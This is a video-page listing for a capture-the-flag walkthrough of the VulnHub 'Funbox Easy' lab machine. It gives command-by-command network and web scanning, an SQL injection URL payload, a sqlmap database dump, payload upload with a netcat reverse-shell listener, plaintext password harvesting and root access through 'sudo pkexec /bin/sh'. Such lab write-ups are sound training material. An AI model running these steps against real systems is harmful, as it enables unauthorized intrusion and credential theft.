CTF Walk Through - Funbox Easy- VulnHub

CTF Walk Through | HackProof Academy | [email protected]



2 subscriber(s)


	14/02/2025 Shad Hussain Knowledge Views 206 Comments 0 Analytics Video English DMCA Add Favorite Copy Link https://www.youtube.com/watch?v=whPnkPUhedk&t=4s
	CTF Walk Through - Funbox Easy- VulnHub

Machine Link : https://www.vulnhub.com/entry/funbox-easy,526/ STEP1 arp-scan -l FINDING 192.168.0.105 ------------------------------------------------------------------------------------------------- STEP2 nmap -sSV -A -Pn -p- 192.168.0.105 FINDING 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) 33060/tcp open mysqlx MySQL X protocol listener ------------------------------------------------------------------------------------------------- STEP3 dirb http://192.168.0.105 FINDING + http://192.168.0.105/robots.txt (CODE:200\|SIZE:14) == DIRECTORY: http://192.168.0.105/secret/ + http://192.168.0.105/server-status (CODE:403\|SIZE:278) == DIRECTORY: http://192.168.0.105/store/ ---- Entering directory: http://192.168.0.105/admin/ ---- == DIRECTORY: http://192.168.0.105/admin/assets/ ---- Entering directory: http://192.168.0.105/store/ ---- + http://192.168.0.105/store/admin.php (CODE:200\|SIZE:3153) == DIRECTORY: http://192.168.0.105/store/controllers/ == DIRECTORY: http://192.168.0.105/store/database/ == DIRECTORY: http://192.168.0.105/store/functions/ + http://192.168.0.105/store/index.php (CODE:200\|SIZE:3998) == DIRECTORY: http://192.168.0.105/store/models/ == DIRECTORY: http://192.168.0.105/store/template/ http://192.168.0.105/store/ http://192.168.0.105/store/admin.php http://192.168.0.105/secret/ „Anyone who lives within their means suffers from a lack of imagination.“ Oscar Wilde (*1854 - †1900) http://192.168.0.105/admin/ ------------------------------------------------------------------------------------------------- STEP4 nikto --host http://192.168.0.105 FINDING + /admin/: This might be interesting. + /secret/: This might be interesting. + /store/: This might be interesting. + /admin/index.php: This might be interesting: has been seen in web logs from an unknown scanner. + 8103 requests: 0 error(s) and 12 item(s) reported on remote host ------------------------------------------------------------------------------------------------- STEP5 dirsearch -u http://192.168.0.105 FINDING http://192.168.0.105/index.php http://192.168.0.105/index.php/login/registration.php ------------------------------------------------------------------------------------------------- STEP6 http://192.168.31.119/store/book.php?bookisbn=978-1-49192-706-9 CHANGE IT TO http://192.168.31.119/store/book.php?bookisbn=1%27+or+1=1-- FINDING Cant retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1 ------------------------------------------------------------------------------------------------- STEP7 sqlmap http://192.168.31.119/store/book.php?bookisbn= --dump-all --batch -D store FINDING +--------------------------------------------------+--------+ \| pass \| name \| +--------------------------------------------------+--------+ \| d033e22ae348aeb5660fc2140aec35850c4da997 (admin) \| admin \| +--------------------------------------------------+--------+ ------------------------------------------------------------------------------------------------- STEP8 http://192.168.31.119/store/book.php?bookisbn=978-1-49192-706-9 http://192.168.0.105/store/admin.php admin - admin -- use as user id and password FINDING http://192.168.31.119/store/admin_book.php ------------------------------------------------------------------------------------------------- STEP9 add a new record upload a payload ------------------------------------------------------------------------------------------------- STEP10 nc -nvlp 192.168.31.119 on new terminal hit -- http://192.168.31.119/store/ get a reverse shell ------------------------------------------------------------------------------------------------- STEP11 cd /home cd tony ls -la cat password.txt FINDING ssh: yxcvbnmYYY gym/admin: asdfghjklXXX /store: [email protected] admin ------------------------------------------------------------------------------------------------- STEP12 on new terminal ssh [email protected] pwd : yxcvbnmYYY sudo -l FINDING (root) NOPASSWD: /usr/bin/yelp (root) NOPASSWD: /usr/bin/dmf (root) NOPASSWD: /usr/bin/whois (root) NOPASSWD: /usr/bin/rlogin (root) NOPASSWD: /usr/bin/pkexec (root) NOPASSWD: /usr/bin/mtr (root) NOPASSWD: /usr/bin/finger (root) NOPASSWD: /usr/bin/time (root) NOPASSWD: /usr/bin/cancel (root) NOPASSWD: /root/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/q/r/s/t/u/v/w/x/y/z/.smile.sh ------------------------------------------------------------------------------------------------- STEP13 https://gtfobins.github.io/gtfobins/pkexec/#sudo FINDING sudo pkexec /bin/sh whoami root cd /root ls -la car root.flag __________ ___. ___________ \_ _____/_ __ ____\_ \|__ _______ ___ /\ \_ _____/____ _________.__. \| __)\| \| \/ \\| __ \ / _ \ \/ / \/ \| __)_\__ \ / ___ \| \| \| \ \| \| / \| \ \_\ ( _ /\ \| \/ __ \_\___ \ \___ \| \___ / \|____/\|___\| /___ /\____/__/\_ \ \/ /_______ (____ /____ / ____\| \/ \/ \/ \/ \/ \/ \/ \/ -------------------------------------------------------------------------------------------------

No article(s) with matching content





	WhatsApp no. else use your mail id to get the otp...! Please tick to get otp in your mail id...!

© mutebreak.com | All Rights Reserved